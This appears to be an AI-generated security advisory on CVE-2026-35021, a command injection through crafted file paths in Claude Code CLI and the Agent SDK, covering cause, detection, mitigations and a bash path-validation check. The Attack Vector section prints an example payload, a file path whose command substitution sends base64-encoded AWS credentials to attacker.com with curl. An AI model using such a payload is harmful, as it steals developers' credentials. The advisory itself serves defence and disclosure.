CVE-2026-35021 Overview
Anthropic Claude Code CLI and Claude Agent SDK contain an OS command injection vulnerability in the prompt editor invocation utility that allows attackers to execute arbitrary commands by crafting malicious file paths. Attackers can inject shell metacharacters such as $() or backtick expressions into file paths that are interpolated into shell commands executed via execSync. Although the file path is wrapped in double quotes, POSIX shell semantics (POSIX §2.2.3) do not prevent command substitution within double quotes, allowing injected expressions to be evaluated and resulting in arbitrary command execution with the privileges of the user running the CLI.
Critical Impact
Arbitrary command execution with user privileges through malicious file path injection in AI development tools, potentially compromising developer workstations and CI/CD environments.
Affected Products
- Anthropic Claude Code CLI
- Anthropic Claude Agent SDK
- Development environments utilizing the prompt editor invocation utility
Discovery Timeline
- 2026-04-06 - CVE-2026-35021 published to NVD
- 2026-04-07 - Last updated in NVD database
Technical Details for CVE-2026-35021
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS Command Injection. The flaw exists in the prompt editor invocation utility within the Claude Code CLI and Claude Agent SDK. When users interact with the CLI, file paths are processed and interpolated directly into shell commands that are executed using the execSync function.
The core issue stems from insufficient sanitization of user-supplied file paths before they are passed to the shell. While the implementation wraps file paths in double quotes as a protective measure, this approach fails to prevent command injection because POSIX shell semantics explicitly allow command substitution within double-quoted strings. Specifically, POSIX §2.2.3 defines that $() syntax and backtick expressions are expanded even within double quotes.
An attacker who can control or influence the file path—whether through social engineering, malicious repositories, or compromised project configurations—can craft a path containing shell metacharacters that execute arbitrary commands when the CLI processes the file.
Root Cause
The root cause is the use of execSync with string interpolation for shell command construction without proper input sanitization. The developer assumption that double-quoting file paths would prevent command injection is incorrect under POSIX shell semantics. The proper mitigation would involve either using array-based command execution that avoids shell interpretation entirely, or implementing strict input validation that rejects or escapes shell metacharacters before interpolation.
Attack Vector
This vulnerability requires local access and user interaction. An attacker must craft a malicious file path containing shell metacharacters such as $(malicious_command) or `malicious_command`. When a user invokes the prompt editor utility with this crafted path—either directly or through a poisoned project configuration—the injected commands execute with the privileges of the user running the CLI.
Attack scenarios include:
- Malicious Repository Cloning: An attacker publishes a repository containing project files with crafted file paths that execute commands when developers use Claude Code CLI tools
- CI/CD Pipeline Compromise: In automated environments, attackers could inject malicious paths through pull requests or configuration files, leading to credential exfiltration
- Social Engineering: Tricking users into opening projects or files with specially crafted names
The vulnerability mechanism involves the shell interpreting command substitution expressions within double quotes. For example, a file path like $(curl attacker.com/exfil?data=$(cat ~/.aws/credentials | base64)) would execute the nested commands before the outer command completes. Technical details are available in the VulnCheck Advisory.
Detection Methods for CVE-2026-35021
Indicators of Compromise
- Unusual process spawning from Claude Code CLI or Agent SDK processes, particularly network-related commands like curl, wget, or nc
- File paths containing shell metacharacters ($(), backticks, |, ;) in project configurations or command history
- Unexpected outbound network connections originating from development tool processes
- Credential file access patterns inconsistent with normal development workflows
Detection Strategies
- Monitor process trees for suspicious child processes spawned by Node.js processes running Claude Code CLI
- Implement file integrity monitoring on sensitive credential stores and configuration files accessed during CLI operations
- Deploy endpoint detection rules that alert on command substitution patterns in file path arguments
- Analyze command-line arguments passed to shell execution functions for injection patterns
Monitoring Recommendations
- Enable verbose logging for Claude Code CLI and Agent SDK to capture file path operations
- Configure SIEM rules to correlate file path inputs with subsequent process creation events
- Monitor for base64 encoding operations combined with network exfiltration attempts
- Establish baseline behavior for Claude Code CLI processes and alert on deviations
How to Mitigate CVE-2026-35021
Immediate Actions Required
- Review and audit any project configurations, especially those from untrusted sources, for malicious file paths containing shell metacharacters
- Restrict usage of Claude Code CLI in automated CI/CD environments until patched versions are available
- Implement network segmentation to limit the impact of potential command execution from developer workstations
- Educate development teams about the risk of opening untrusted projects with AI coding tools
Patch Information
Organizations should monitor Anthropic's official channels for security updates addressing this vulnerability. Review the Phoenix Security Analysis and VulnCheck Advisory for the latest remediation guidance and patch availability information.
Workarounds
- Implement wrapper scripts that validate file paths before passing them to Claude Code CLI, rejecting paths containing $, backticks, or other shell metacharacters
- Run Claude Code CLI in isolated container environments with minimal privileges and no access to sensitive credentials
- Use sandboxed execution environments that prevent network access from CLI processes
- Temporarily disable or bypass the prompt editor invocation utility if possible, using alternative workflows
# Example file path validation before CLI invocation
validate_path() {
local path="$1"
# Reject paths containing shell metacharacters
if [[ "$path" =~ [\$\`\|\;\&] ]]; then
echo "ERROR: Potentially malicious file path detected"
exit 1
fi
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
